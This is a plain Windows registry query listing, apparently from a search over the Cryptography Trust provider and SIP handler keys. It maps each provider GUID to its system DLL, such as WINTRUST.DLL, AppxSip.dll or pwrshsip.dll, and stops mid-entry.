HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{31D1ADC1-D329-11D1-8ED8-0080C76516C6} $DLL REG_SZ C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsec.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{6078065b-8f22-4b13-bd9b-5b762776f386} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{64B9D180-8DA2-11CF-8736-00AA00A485EB} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{7801EBD0-CF4B-11D0-851F-0060979387EA} $DLL REG_SZ C:\Windows\System32\Cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5} $DLL REG_SZ C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsecimpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\urlmon.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\ieframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{189A3842-3041-11D1-85E1-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{31D1ADC1-D329-11D1-8ED8-0080C76516C6} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{6078065b-8f22-4b13-bd9b-5b762776f386} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{64B9D180-8DA2-11CF-8736-00AA00A485EB} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{7801EBD0-CF4B-11D0-851F-0060979387EA} $DLL REG_SZ C:\Windows\System32\Cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Initialization\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{189A3842-3041-11D1-85E1-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{31D1ADC1-D329-11D1-8ED8-0080C76516C6} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{6078065b-8f22-4b13-bd9b-5b762776f386} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{64B9D180-8DA2-11CF-8736-00AA00A485EB} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Message\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{189A3842-3041-11D1-85E1-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{31D1ADC1-D329-11D1-8ED8-0080C76516C6} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{6078065b-8f22-4b13-bd9b-5b762776f386} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{64B9D180-8DA2-11CF-8736-00AA00A485EB} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Signature\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.4.1.311.10.3.3 $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.5.5.7.3.1 $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Usages\1.3.6.1.5.5.7.3.2 $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Usages\2.16.840.1.113730.4.1 $DLL REG_SZ WINTRUST.DLL End of search: 97 match(es) found. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllLogMismatchPinRules\DEFAULT Dll REG_MULTI_SZ C:\Windows\SysWOW64\cryptui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\#16 Dll REG_SZ C:\Windows\SysWOW64\cryptnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllOpenStoreProv\Ldap Dll REG_SZ C:\Windows\SysWOW64\cryptnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllProtectedRootMessageBox\DEFAULT Dll REG_MULTI_SZ C:\Windows\SysWOW64\cryptui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptDllProtectPrompt\DEFAULT Dll REG_MULTI_SZ C:\Windows\SysWOW64\cryptui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{000C10F1-0000-0000-C000-000000000046} Dll REG_SZ C:\Windows\SysWOW64\MSISIP.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{06C9E010-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\SysWOW64\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Dll REG_SZ C:\Windows\SysWOW64\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{1A610570-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\SysWOW64\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{5598CFF1-68DB-4340-B57F-1CACF88C9A51} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351} Dll REG_SZ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{9F3053C5-439D-4BF7-8A77-04F0450A1D9F} Dll REG_SZ C:\Windows\SysWOW64\EsdSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{C689AABA-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{D1D04F0C-9ABA-430D-B0E4-D7E96ACCE66C} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{DE351A42-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllCreateIndirectData\{DE351A43-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{9F3053C5-439D-4BF7-8A77-04F0450A1D9F} Dll REG_SZ C:\Windows\SysWOW64\EsdSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{C689AABA-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{DE351A42-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetCaps\{DE351A43-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{C689AABA-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{DE351A42-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSealedDigest\{DE351A43-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{000C10F1-0000-0000-C000-000000000046} Dll REG_SZ C:\Windows\SysWOW64\MSISIP.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{06C9E010-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\SysWOW64\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Dll REG_SZ C:\Windows\SysWOW64\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{1A610570-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\SysWOW64\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{5598CFF1-68DB-4340-B57F-1CACF88C9A51} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351} Dll REG_SZ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{9F3053C5-439D-4BF7-8A77-04F0450A1D9F} Dll REG_SZ C:\Windows\SysWOW64\EsdSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{C689AABA-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{D1D04F0C-9ABA-430D-B0E4-D7E96ACCE66C} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{DE351A42-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{DE351A43-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{000C10F1-0000-0000-C000-000000000046} Dll REG_SZ C:\Windows\SysWOW64\MSISIP.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{06C9E010-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\SysWOW64\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Dll REG_SZ C:\Windows\SysWOW64\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{1A610570-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\SysWOW64\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{5598CFF1-68DB-4340-B57F-1CACF88C9A51} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{603BCC1F-4B59-4E08-B724-D2C6297EF351} Dll REG_SZ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{9F3053C5-439D-4BF7-8A77-04F0450A1D9F} Dll REG_SZ C:\Windows\SysWOW64\EsdSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllIsMyFileType2\{D1D04F0C-9ABA-430D-B0E4-D7E96ACCE66C} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{000C10F1-0000-0000-C000-000000000046} Dll REG_SZ C:\Windows\SysWOW64\MSISIP.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{06C9E010-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\SysWOW64\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Dll REG_SZ C:\Windows\SysWOW64\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{1A610570-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\SysWOW64\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{5598CFF1-68DB-4340-B57F-1CACF88C9A51} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{603BCC1F-4B59-4E08-B724-D2C6297EF351} Dll REG_SZ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{9F3053C5-439D-4BF7-8A77-04F0450A1D9F} Dll REG_SZ C:\Windows\SysWOW64\EsdSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{C689AABA-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} Dll REG_SZ C:\Windows\SysWOW64\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllPutSignedDataMsg\{D1D04F0C-9ABA-430D-B0E4-D7E96ACCE66C} Dll 